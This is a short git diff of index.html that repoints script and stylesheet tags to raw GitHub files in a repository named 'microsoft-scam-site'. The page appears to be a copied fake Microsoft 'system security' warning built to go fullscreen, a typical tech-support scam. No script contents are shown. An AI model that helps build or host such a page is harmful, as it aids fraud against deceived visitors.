--- a/index.html
+++ b/index.html
@@ -9,10 +9,10 @@
 	<link rel="stylesheet" type="text/css" href="./システムのセキュリティ_files/lul.min.css">
 	<script src="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/j-3.7.1.min.js.%E3%83%80%E3%82%A6%E3%83%B3%E3%83%AD%E3%83%BC%E3%83%89"></script>
 	<script src="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/b.min.js.%E3%83%80%E3%82%A6%E3%83%B3%E3%83%AD%E3%83%BC%E3%83%89"></script>
-	<script src="./システムのセキュリティ_files/c.js.ダウンロード"></script>
-	<script src="./システムのセキュリティ_files/f.js.ダウンロード"></script>
-	<script src="./システムのセキュリティ_files/cc.js.ダウンロード"></script>
-	<link href="./システムのセキュリティ_files/cc.css" rel="stylesheet">
+	<script src="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/c.js.%E3%83%80%E3%82%A6%E3%83%B3%E3%83%AD%E3%83%BC%E3%83%89"></script>
+	<script src="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/f.js.%E3%83%80%E3%82%A6%E3%83%B3%E3%83%AD%E3%83%BC%E3%83%89"></script>
+	<script src="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/cc.css"></script>
+	<link href="https://raw.githubusercontent.com/Wojix/microsoft-scam-site/refs/heads/main/cc.css" rel="stylesheet">
 
 </head>
 <body id="elementToFullscreen">
